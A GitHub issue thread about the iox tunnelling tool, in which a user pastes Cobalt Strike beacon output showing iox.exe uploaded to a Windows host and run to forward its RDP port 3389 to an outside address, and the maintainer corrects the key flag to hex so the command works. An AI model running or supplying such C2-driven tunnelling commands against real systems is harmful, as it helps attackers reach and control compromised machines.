### ISSUE TITLE
Not hexadecimal string

### ISSUE THREAD

**Issue by DarknightCanada** [EddieIvan01/iox#4]
keep getting this issue 
`keep getting this error when I try to run the port forward
[*] Tasked beacon to list files in . [+] host called home, sent: 19 bytes [-] could not open C:\Windows\Temp\*: 5 [*] cd c:\users\public [*] Tasked beacon to upload /root/Downloads/taowu-cobalt-strike-english/script/iox.exe as iox.exe [+] host called home, sent: 1046589 bytes [+] host called home, sent: 1040460 bytes [+] host called home, sent: 228371 bytes [*] Tasked beacon to run: iox.exe fwd -r 127.0.0.1:3389 -r *8.8.8.8:3389 -k 65535 [+] host called home, sent: 86 bytes [+] received output: Not hexadecimal string`

**Comment by EddieIvan01** [comment]
`-k` needs to specify a hexadecimal string

Change `-k 65535` to `-k ffff`

**Comment by DarknightCanada** [comment]
Thank you :) It worked
